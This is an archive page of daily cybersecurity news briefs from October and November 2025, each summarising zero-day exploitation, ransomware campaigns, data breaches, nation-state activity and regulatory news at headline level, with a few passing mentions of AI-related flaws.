This reporting period for November 14, 2025, is dominated by major law enforcement actions and high-stakes cyberattacks. A global coalition led by Europol executed 'Operation Endgame,' dismantling over 1,000 servers tied to prolific malware families. Concurrently, the Cl0p ransomware group exploited a critical Oracle zero-day to breach security firm Entrust. Microsoft also patched an actively exploited Windows Kernel zero-day, while CISA issued an updated warning on the evolving Akira ransomware, which now targets Nutanix virtual machines.

Nov 13, 20258 articles

Microsoft Patches Actively Exploited Windows Zero-Day as Global Law Enforcement Dismantles Major Cybercrime Rings

In a critical 24-hour period ending November 13, 2025, the cybersecurity landscape was dominated by Microsoft's emergency patch for an actively exploited Windows Kernel zero-day (CVE-2025-62215) and a major international law enforcement action, 'Operation Endgame,' which dismantled the infrastructure of several malware-as-a-service operations. Other significant events include the discovery of an APT exploiting Cisco and Citrix zero-days, the introduction of a sweeping new cyber resilience bill in the UK, and CISA's addition of newly exploited vulnerabilities to its KEV catalog.

Nov 12, 20256 articles

Microsoft Patches Actively Exploited Windows Zero-Day; Advanced Actors Target Cisco and Citrix in New Campaigns

In cybersecurity news for November 12, 2025, Microsoft has released its November Patch Tuesday update, addressing a critical Windows Kernel zero-day (CVE-2025-62215) under active exploitation. Concurrently, Amazon's threat intelligence team revealed that an advanced threat actor is exploiting new zero-days in Cisco ISE and Citrix NetScaler. Major developments also include a sweeping new cybersecurity bill in the UK, a crippling ransomware attack on Asahi Breweries in Japan, and the Clop ransomware gang claiming an attack on Dartmouth College. Other significant events involve a large-scale phishing campaign abusing Facebook's infrastructure and new NYDFS compliance deadlines taking effect.

Nov 11, 20256 articles

Triofox Zero-Day Exploited In-the-Wild; CMMC Enforcement Begins for DoD Contractors

This cybersecurity brief for November 11, 2025, covers several critical developments. A zero-day in Gladinet's Triofox (CVE-2025-12480) is being actively exploited for remote code execution. CISA added a zero-click Samsung mobile flaw (CVE-2025-21042) to its KEV catalog following active exploitation. The DoD has officially begun CMMC enforcement for its contractors. Other major incidents include a destructive campaign by the KONNI APT against Android users, and significant data breaches at Nikkei and Hyundai AutoEver.

Nov 10, 20256 articles

China's Cyber Arsenal Exposed in Massive Leak; Critical Flaws Threaten QNAP, Docker, and Kubernetes

This cybersecurity brief for November 10, 2025, covers a series of high-impact events. A catastrophic data breach at Chinese firm Knownsec has exposed state-sponsored hacking tools and global target lists. Concurrently, critical zero-day vulnerabilities are forcing urgent patches for QNAP NAS devices and the runC container runtime, which underpins Docker and Kubernetes. Other major incidents include a significant data breach affecting 1.5 million Swedes, a cyberattack on the U.S. Congressional Budget Office, and new regulatory rollouts from the DoD and guidance from the OWASP Foundation.

Nov 9, 20257 articles

Clop Ransomware Breaches Washington Post; Critical Flaws Found in Docker, QNAP, and AI Models

This cybersecurity brief for November 9, 2025, covers a series of high-impact events. The Clop ransomware group has been confirmed as the perpetrator behind a major breach at The Washington Post, exploiting Oracle E-Business Suite vulnerabilities in a campaign affecting over 100 organizations. Concurrently, Microsoft revealed a novel 'Whisper Leak' side-channel attack capable of inferring AI chat topics from encrypted traffic. Critical vulnerabilities have also emerged, with the GlassWorm malware resurfacing in the VSCode marketplace, QNAP patching seven zero-days from Pwn2Own, and newly disclosed flaws in the runC container runtime threatening Docker and Kubernetes environments. These incidents highlight escalating threats across enterprise software, AI platforms, and cloud infrastructure.

Nov 8, 20257 articles

Samsung Zero-Day Exploited by LANDFALL Spyware; Sandworm Escalates Destructive Attacks on Ukraine

This cybersecurity publication for November 8, 2025, covers a critical period marked by sophisticated mobile espionage, escalating nation-state attacks, and a record surge in supply chain compromises. Key stories include the discovery of the LANDFALL spyware using a Samsung zero-day for zero-click attacks in the Middle East, a new report detailing Russia's Sandworm group intensifying destructive wiper attacks against Ukraine's critical infrastructure, and data showing software supply chain attacks hit an all-time high in October, driven by ransomware gangs like Qilin.

Nov 7, 20257 articles

Cisco Firewalls Under Siege by New DoS Attacks; AI Supercharges Ransomware Campaigns

In the period covering November 6-7, 2025, the cybersecurity landscape was dominated by new attack variants targeting critical Cisco firewall vulnerabilities, causing persistent denial-of-service conditions. Concurrently, reports emerged detailing how threat actors are leveraging AI to drastically shorten ransomware attack timelines, with Europe becoming a primary target. Other major developments include a sophisticated global phishing campaign against Booking.com users, the discovery of Android spyware delivered via a Samsung zero-day, and a record-breaking month for software supply chain attacks driven by ransomware groups like Qilin and Akira.

Nov 6, 20257 articles

AI-Powered Malware Emerges as Critical Zero-Click Flaw Hits Billions of Android Devices

This cybersecurity brief for November 6, 2025, covers a landmark shift in the threat landscape with Google's discovery of AI-powered malware like PROMPTFLUX, which uses LLMs to mutate its own code. Concurrently, a critical zero-click RCE vulnerability (CVE-2025-48593) was disclosed for Android versions 13-16, posing a severe risk to billions of users. Other major incidents include the Qilin ransomware gang's claimed breach of Habib Bank AG Zurich, a cyberattack on the U.S. Congressional Budget Office, and a supply chain attack by Cl0p impacting The Washington Post via an Oracle zero-day.

Nov 5, 20257 articles

Critical Infrastructure Under Fire: CISA Warns of Major ICS Flaws, State-Sponsor Breaches F5 BIG-IP

This cybersecurity brief for November 5, 2025, covers a series of high-stakes threats targeting critical infrastructure and enterprise security. CISA has disclosed severe vulnerabilities in industrial control systems from five vendors, while a state-sponsored actor has breached F5, compromising its BIG-IP source code and creating a significant supply chain risk. Other major developments include the evolution of the DragonForce ransomware group into a 'cartel' with ties to Scattered Spider, the indictment of cybersecurity insiders for deploying BlackCat ransomware, and a massive data breach at a Swedish IT firm exposing 1.5 million individuals' data. These events underscore the growing threats to OT environments, the sophistication of ransomware actors, and the persistent danger of insider threats and cloud misconfigurations.

Nov 4, 20256 articles

Insider Threats, Zero-Days, and Ransomware Shake Global Cybersecurity Landscape

This 24-hour cybersecurity brief for November 4, 2025, covers critical developments including the indictment of cybersecurity professionals for running a BlackCat ransomware ring, a severe zero-click RCE in Android, and a new Cl0p campaign exploiting an Oracle zero-day. Reports also highlight the emergence of the Conti-derived DragonForce ransomware and the massive financial fallout for SK Telecom after a major data breach.

Nov 3, 20255 articles

Chinese APT 'Airstalk' Malware Targets BPO Supply Chains; Insider Threats and Cl0p Zero-Day Exploits Escalate

This cybersecurity brief for November 3rd, 2025, covers a surge in sophisticated threats. Key developments include the discovery of 'Airstalk,' a new Chinese APT malware using MDM APIs for C2 in supply chain attacks against the BPO sector. In a shocking insider threat case, cybersecurity professionals were indicted for using ALPHV/BlackCat ransomware. The Cl0p ransomware group is actively exploiting an Oracle zero-day (CVE-2025-61882), while an unpatched Windows LNK flaw (CVE-2025-9491) continues to be leveraged by APTs. Additionally, new reports highlight advanced phishing on LinkedIn, the massive financial fallout from the SK Telecom breach, and escalating ransomware attacks across Europe.

Nov 2, 20257 articles

Penn Breach Exposes 1.2M Records; Critical Android Zero-Click & Chinese APTs Target Zero-Days

This cybersecurity brief for November 2nd, 2025, covers a series of high-impact security incidents. A massive data breach at the University of Pennsylvania has allegedly exposed 1.2 million donor records. Google has issued an urgent patch for a critical zero-click RCE vulnerability in Android. Meanwhile, Chinese state-sponsored threat actors, including Bronze Butler and UNC6384, are actively exploiting zero-day vulnerabilities in Lanscope and Windows systems to deploy malware and spy on targets in Europe and Asia. Other significant events include a major data breach at a Polish loan company and an Australian government warning about new malware targeting Cisco devices.

Nov 1, 20258 articles

China-Linked Actors Exploit Windows & VMware Zero-Days; Ransomware Gangs Hit Major Corporations

This cybersecurity brief for November 1, 2025, covers a surge in state-sponsored cyber-espionage and critical zero-day exploitation. Chinese-linked threat actors are actively leveraging an unpatched Windows vulnerability (CVE-2025-9491) to spy on European diplomats and a now-patched VMware flaw (CVE-2025-41244) for privilege escalation. Concurrently, ransomware remains a dominant threat, with the Akira group claiming a breach at Apache OpenOffice, RansomHouse hitting Japanese retailer Askul, and a massive data breach at Conduent affecting over 10.5 million individuals. Other significant developments include the discovery of new malware families 'KYBER' and 'Airstalk', a supply chain attack on the npm registry, and an ongoing campaign targeting Cisco devices in Australia.

Oct 31, 20257 articles

PhantomRaven Supply Chain Attack Hits npm; Conduent Breach Exposes 10.5M; CISA Flags Actively Exploited Flaws

This cybersecurity brief for October 31, 2025, covers a surge in sophisticated threats. Highlights include the 'PhantomRaven' supply chain attack on npm using novel evasion techniques, a massive data breach at Conduent affecting 10.5 million individuals, and CISA adding critical, actively exploited vulnerabilities in XWiki and VMware to its KEV catalog. Other major incidents include a prolonged nation-state breach at a key telecom provider, a significant Azure outage, and escalating ransomware campaigns from the Qilin group.

Oct 30, 20257 articles

Microsoft Azure Outage Causes Global Chaos; CISA Warns of Actively Exploited WSUS Flaw

This cybersecurity brief for October 30, 2025, covers a widespread Microsoft Azure outage triggered by a configuration error, a critical CISA alert for an actively exploited Windows Server vulnerability (CVE-2025-59287), and massive data breaches at government contractor Conduent and consulting giant EY. New threats include the 'Herodotus' Android malware and the 'logins[.]zip' infostealer, while the UK government considers a ransomware payment ban in response to escalating attacks.

Oct 29, 20256 articles

Urgent WSUS Patch Mandated Amidst Wave of Zero-Day Exploits Targeting Oracle, Chrome, and AI Agents

This cybersecurity brief for October 29, 2025, covers a series of critical threats, led by an urgent CISA directive to patch an actively exploited, wormable RCE vulnerability in Windows Server Update Services (CVE-2025-59287). The threat landscape is further defined by major zero-day attacks, with the FIN11/Clop ransomware group targeting Oracle EBS systems at industrial giants, and the 'Mem3nt0 mori' APT exploiting a Chrome zero-day. New malware strains have also emerged, including 'Airstalk' in a suspected nation-state supply chain attack and 'Herodotus', an Android trojan that mimics human behavior. Additionally, a report highlights the destructive impact of the 'Scattered Spider' group and a massive surge in AI-powered vishing attacks.

Oct 28, 20257 articles

CISA Warns of Actively Exploited Zero-Days in Fortinet & Dassault Systems; Massive Infostealer Dump Exposes 183M Credentials

This 24-hour period is marked by critical zero-day vulnerabilities and massive data exposure events. CISA has added actively exploited flaws in Fortinet's FortiWeb and Dassault Systèmes' DELMIA Apriso products to its KEV catalog, demanding urgent patching from federal agencies. Concurrently, a colossal dataset of 183 million credentials, harvested by infostealer malware like RedLine and Vidar, has been discovered, heightening the risk of widespread credential stuffing attacks. Other significant events include a supply chain breach at healthcare vendor Cerner, new ransomware attacks by Safepay and BlueNoroff, and disclosures of vulnerabilities in Apache Tomcat and OpenAI's new Atlas browser.

Oct 27, 202513 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw as Qilin Ransomware Surges

In cybersecurity news for October 27, 2025, Microsoft issued an emergency patch for a critical, actively exploited remote code execution vulnerability in Windows Server Update Services (WSUS). Concurrently, reports indicate the Qilin ransomware group has become the most prolific operator of 2025, claiming over 700 victims. Other major incidents include a massive China-linked smishing campaign using over 194,000 domains, active exploitation of a critical flaw in Adobe Commerce, and a series of data breaches affecting the retail and healthcare sectors.

Oct 26, 20256 articles

Microsoft Scrambles to Patch Actively Exploited WSUS Flaw; Dublin Airport Breach Hits 3.8M

This cybersecurity brief for October 26, 2025, covers several critical global incidents. A severe, actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency out-of-band patch, with CISA mandating immediate action. In a massive supply chain attack, Dublin Airport disclosed a data breach affecting 3.8 million passengers after a third-party provider, Collins Aerospace, was compromised by ransomware. Meanwhile, a DDoS attack on Russia's food safety agency crippled national supply chains, the Safepay ransomware group targeted a German video surveillance firm, and dozens of nations signed a landmark, albeit controversial, UN cybercrime treaty in Hanoi.

Oct 25, 20252 articles

CISA Issues Emergency Directive for Actively Exploited Microsoft WSUS Flaw; Ransomware Surges 50% in 2025

This cybersecurity brief for October 25, 2025, covers critical developments, led by an emergency CISA directive for an actively exploited remote code execution vulnerability (CVE-2025-59287) in Microsoft's Windows Server Update Service (WSUS). Other major stories include Microsoft's massive October Patch Tuesday fixing 193 flaws and six zero-days, a reported 50% surge in ransomware attacks in 2025 driven by new groups like Qilin, the resurgence of the LockBit ransomware gang with a new 'LockBit 5.0' variant, and a massive 'Smishing Triad' campaign using over 194,000 malicious domains. Global policy shifts are also noted, with the UK and Singapore launching a supply chain security initiative and the UN finalizing its Convention against Cybercrime.

Oct 24, 20258 articles

Critical WSUS Zero-Day Exploited, Prosper Breach Hits 17.6M, and Iranian APT Deploys 'Phoenix' Backdoor

This reporting period, October 23-24, 2025, has been marked by significant and active threats. A critical, actively exploited zero-day vulnerability (CVE-2025-59287) in Microsoft's WSUS has prompted an emergency patch and a CISA KEV alert, posing a severe risk to enterprise networks. In the financial sector, a massive data breach at Prosper Marketplace has exposed the highly sensitive personal and financial data of 17.6 million users. Concurrently, nation-state activity surged with an Iranian-linked APT group targeting over 100 government institutions globally using a new 'Phoenix' backdoor. Other major incidents include Google patching its sixth actively exploited Chrome zero-day of the year and multiple high-impact ransomware attacks affecting manufacturing, education, and critical infrastructure sectors.

Oct 23, 202510 articles

Ransomware Automation Slashes Attack Times to Minutes; Supply Chain Overconfidence Creates Massive Risk

In cybersecurity news for October 23, 2025, the threat landscape is defined by escalating speed and systemic risk. A new report reveals ransomware groups are using automation to compress attack timelines to just 18 minutes from initial access to lateral movement. Simultaneously, another study highlights a dangerous overconfidence in supply chain security, with 94% of firms feeling prepared despite a third failing to conduct basic supplier risk assessments. This is underscored by the staggering £1.9 billion economic cost of the Jaguar Land Rover hack, which cascaded through 5,000 supply chain organizations. Regulators are responding, with New York's DFS issuing new guidance on third-party risk. Meanwhile, CISA has added another actively exploited vulnerability to its KEV catalog, demanding immediate action from federal agencies.

Oct 22, 20257 articles

Ransomware Surges, JLR Hack Costs UK £1.9B, and 'GlassWorm' Hits Developers in Widespread Attacks

This cybersecurity advisory for October 21-22, 2025, covers a dramatic 34% surge in ransomware attacks against global critical infrastructure, with the U.S. being the top target. A separate analysis reveals the staggering economic fallout of a cyberattack on Jaguar Land Rover, costing the UK economy an estimated £1.9 billion. A sophisticated new worm, 'GlassWorm', is spreading through the VS Code ecosystem using invisible code to infect developers. Additionally, critical vulnerabilities have been disclosed in the Netty Java library and Oracle's E-Business Suite, while the UK government issues an urgent call for businesses to bolster defenses.

Oct 21, 20254 articles

Citrix Zero-Day Hits US Gov; APTs & Sophisticated Malware Campaigns Surge Globally

This intelligence brief for October 21, 2025, covers a series of high-impact cybersecurity events. A critical Citrix zero-day, 'CitrixBleed 2.0', led to a major data breach at the U.S. Department of Homeland Security, exposing employee data. Nation-state activity remains high, with China-linked Salt Typhoon targeting European telecoms and Russia-linked COLDRIVER rapidly deploying new malware after public disclosure. A novel supply chain attack, 'GlassWorm', is targeting VS Code developers using advanced obfuscation and a blockchain-based C2. Meanwhile, new reports highlight a 34% surge in ransomware attacks on critical infrastructure and the growing challenge of AI-powered cyberattacks outpacing organizational defenses.

Oct 20, 20258 articles

CISA Mandates Patches for Exploited Flaws; Nation-State Actors Breach F5 and Prosper Suffers Massive Data Leak

This cybersecurity brief for October 20, 2025, covers a series of high-impact events. CISA has added five actively exploited vulnerabilities to its KEV catalog, mandating urgent patching. In a significant supply-chain threat, a nation-state actor breached F5, stealing BIG-IP source code. Meanwhile, the Prosper lending platform disclosed a massive data breach affecting 17.6 million users, and the Cl0p ransomware gang is exploiting a new zero-day in Oracle E-Business Suite. These incidents highlight escalating threats across patch management, supply chain security, and data protection.

Oct 19, 20259 articles

Europol Busts 'SIMCARTEL' CaaS Network; Everest Ransomware Claims Collins Aerospace Attack

This cybersecurity brief for October 19, 2025, covers major international law enforcement actions, high-profile ransomware claims, and critical vulnerability disclosures. Key events include the dismantling of the 'SIMCARTEL' Cybercrime-as-a-Service platform in Europe, the Everest ransomware group claiming responsibility for the disruptive Collins Aerospace attack, and Microsoft's revocation of over 200 malicious certificates used by the Vanilla Tempest group. Additionally, CISA has issued warnings for two actively exploited Windows zero-day vulnerabilities, and a critical RCE flaw has been patched in Microsoft WSUS.

Oct 18, 20256 articles

Nation-State Actors Breach F5 Networks Stealing BIG-IP Source Code; AI Phishing Effectiveness Skyrockets

This cybersecurity brief for October 18, 2025, covers a critical supply chain attack against F5 Networks by a nation-state actor, resulting in the theft of BIG-IP source code and unpatched vulnerability data. Other major developments include a Microsoft report revealing AI-powered phishing is 4.5 times more effective, active exploitation of a Cisco zero-day to deploy rootkits, and the Clop ransomware group breaching an American Airlines subsidiary via Oracle EBS flaws. The period also saw rising ransomware attacks targeting healthcare and increased warnings about supply chain security from the UK's NCSC.

Oct 17, 20259 articles

Microsoft Patches Three Zero-Days, F5 Suffers Nation-State Breach, and Critical Adobe Flaw Actively Exploited

This cybersecurity brief for October 17, 2025, covers a massive Microsoft Patch Tuesday addressing over 172 vulnerabilities, including three actively exploited zero-days. In other major news, F5 Networks disclosed a significant breach by a nation-state actor resulting in source code theft, and CISA issued an urgent warning for a critical, actively exploited Adobe AEM vulnerability with a 10.0 CVSS score. Additional stories include a massive data breach at lending platform Prosper affecting 17.6 million users, a surge in AKIRA ransomware attacks targeting Swiss companies, and new regulatory pressures from a stricter data breach notification law in California.

Oct 16, 20258 articles

CISA Emergency Directive Issued After F5 Source Code Theft by Nation-State Actor; Microsoft Patches Four Actively Exploited Zero-Days

This cybersecurity brief for October 16, 2025, covers a critical supply chain threat following the theft of F5 source code by a Chinese nation-state actor, prompting a CISA emergency directive. Concurrently, Microsoft's October Patch Tuesday addresses over 170 flaws, including four actively exploited zero-days. Other major events include the disruption of a ransomware campaign using signed malware, the discovery of a Chinese APT targeting a Russian IT firm, a massive data breach affecting two major airlines, and the disclosure of critical flaws in industrial control systems.

Oct 15, 20255 articles

Microsoft Patches 172 Flaws and Six Zero-Days; F5 Discloses Nation-State Breach Stealing BIG-IP Source Code

This intelligence briefing for October 15, 2025, covers a massive Microsoft Patch Tuesday addressing 172 vulnerabilities, including three actively exploited zero-days. A critical supply chain threat emerges as F5 discloses a long-term breach by a nation-state actor who stole BIG-IP source code, prompting a CISA emergency directive. Other major developments include the return of the LockBit ransomware group with an upgraded version, a surge in overall ransomware attacks, and multiple data breach and vulnerability disclosures affecting companies like Canadian Tire and Fortinet.

Oct 14, 20256 articles

Microsoft's Massive October Patch Tuesday Fixes 175 Flaws and 3 Zero-Days; F5 Discloses Nation-State Breach

This cybersecurity advisory for October 14, 2025, covers a record-breaking Microsoft Patch Tuesday addressing 175 vulnerabilities, including three actively exploited zero-days. Additionally, F5 disclosed a major breach by a nation-state actor, resulting in the theft of BIG-IP source code and a CISA emergency directive. Other significant events include new campaigns by Chinese APTs Flax Typhoon and Jewelbug, a novel phishing attack abusing NPM infrastructure, and ongoing ransomware activity from the Qilin group.

Oct 13, 20257 articles

Critical Oracle Zero-Day Exploited by TA505 & Cl0p; Discord Vendor Breach Exposes 70,000 IDs

This cybersecurity brief for October 13, 2025, covers a critical zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite being actively exploited by major extortion groups, leading to widespread data theft. Other significant events include a major data breach at a Discord third-party vendor exposing 70,000 user IDs, a novel phishing campaign abusing NPM infrastructure, and a report showing a 30% surge in ransomware attacks against healthcare vendors.

Oct 12, 20258 articles

Massive Supply Chain Attacks Expose Millions; Clop Ransomware Targets Harvard and Oracle

In the period covering October 12, 2025, the cybersecurity landscape was dominated by large-scale supply chain attacks and aggressive ransomware campaigns. A hacker collective dubbed 'Scattered Lapsus$ Hunters' leaked data for 5.7 million Qantas customers and 7.3 million Vietnam Airlines customers after compromising a shared Salesforce environment. Concurrently, the Clop ransomware gang claimed a breach of Harvard University and was found actively exploiting a zero-day in Oracle E-Business Suite, for which Oracle released an emergency patch for a separate, newly discovered high-severity flaw. Other significant events include the abuse of the Velociraptor DFIR tool to deploy ransomware and reports of North Korean hackers stealing a record $2 billion in crypto assets in 2025.

Oct 11, 20257 articles

Critical Flaws in Oracle & Redis Under Active Threat; Widespread Supply Chain Attacks Target Developers and Cloud Services

This intelligence briefing for October 11, 2025, covers a series of critical cybersecurity incidents. Major themes include the active exploitation of a zero-day in Oracle E-Business Suite by the Cl0p ransomware group and the patching of a 13-year-old RCE flaw in Redis. Supply chain attacks remain a dominant threat, with malicious npm and Node.js packages targeting developers, and a Discord breach originating from a third-party vendor. SonicWall disclosed two major incidents: active exploitation of its VPNs by Akira ransomware and a full-scale breach of its Cloud Backup service affecting all customers. Additionally, new malware strains like 'Chaosbot' and the AI-powered 'MalTerminal' demonstrate evolving attacker TTPs.

Oct 10, 20258 articles

Cl0p Exploits Oracle Zero-Day in Massive Extortion Spree; SonicWall Breach Hits All Cloud Backup Users

This cybersecurity brief for October 10, 2025, covers a critical period marked by high-impact zero-day exploitation and significant data breaches. A Cl0p-affiliated group has been exploiting an Oracle E-Business Suite zero-day (CVE-2025-61882) for months, leading to an FBI warning. Concurrently, SonicWall admitted a breach impacted all cloud backup customers, exposing firewall configurations. Other major incidents include the 'CamoLeak' flaw in GitHub Copilot allowing code exfiltration, a supply chain breach at crypto platform Shuffle.com, and the emergence of new ransomware and APT groups.

Oct 9, 20259 articles

Cl0p Exploits Oracle Zero-Day; Threat Actors Weaponize Legitimate Security Tools in Widespread Attacks

This cybersecurity brief for October 9, 2025, covers a surge in critical threats, led by the Cl0p ransomware gang's exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. A significant trend this period is the abuse of legitimate tools, with threat actors weaponizing the Velociraptor DFIR tool and exploiting a critical flaw (CVE-2025-10035) in Fortra's GoAnywhere MFT. Other major events include the Qilin ransomware attack on Japanese beverage giant Asahi, a sophisticated phishing campaign targeting marketing professionals, and new guidance from the G7 and UK's NCSC on managing AI risks and a sharp rise in national-level cyberattacks.

Oct 8, 20258 articles

Salesforce Defies Extortionists After Customer Data Heist; Cl0p Exploits Critical Oracle Zero-Day

This cybersecurity brief for October 8, 2025, covers several critical incidents. A threat actor alliance named 'Scattered LAPSUS$ Hunters' claims to have stolen data from over 40 Salesforce customers via social engineering, though Salesforce itself was not breached and refuses to pay the ransom. Concurrently, the Cl0p ransomware group is actively exploiting a critical zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. Other major events include a significant data breach at a Red Hat consulting GitLab instance exposing sensitive client data, a ransomware attack by the Qilin group on Japanese beverage giant Asahi, and CISA adding a Zimbra XSS flaw to its KEV catalog.

Oct 7, 20259 articles

Clop Exploits Oracle Zero-Day; CISA Catalogs Multiple Actively Exploited Flaws

This cybersecurity advisory for October 7, 2025, covers a critical period marked by the active exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite by the Clop ransomware group, prompting urgent international warnings. Concurrently, CISA has added several other flaws to its KEV catalog, including vulnerabilities in Microsoft Windows and Zimbra. Other major developments include a new extortion campaign by the 'Scattered Lapsus$ Hunters' collective targeting Salesforce customers, a critical RCE flaw in Redis, and Signal's threat to exit the EU over the proposed 'Chat Control' surveillance bill.

Oct 6, 202510 articles

Microsoft Patches 3 Zero-Days Under Active Attack; Cl0p, Qilin, and Flax Typhoon Launch Major Campaigns

In the period of October 5-6, 2025, the cybersecurity landscape was dominated by Microsoft's massive October Patch Tuesday, which addressed 175 vulnerabilities including three actively exploited zero-days. Concurrently, major threat actors launched significant campaigns: the Cl0p ransomware group exploited a zero-day in Oracle E-Business Suite for mass extortion, the Qilin gang crippled Asahi Breweries demanding a $10M ransom, and the Chinese APT Flax Typhoon was found using a novel ArcGIS server backdoor for long-term espionage. Other key events include a major escalation in the SonicWall data breach, a novel phishing technique abusing the NPM registry, and new warnings from CISA regarding widespread ICS vulnerabilities.

Oct 5, 202510 articles

Main Sections

Home

Latest cybersecurity threats and intelligence

Articles

In-depth security analysis and reports

Publications

Curated threat intelligence briefings

Legal & Information

Privacy PolicyTerms of ServiceDisclaimer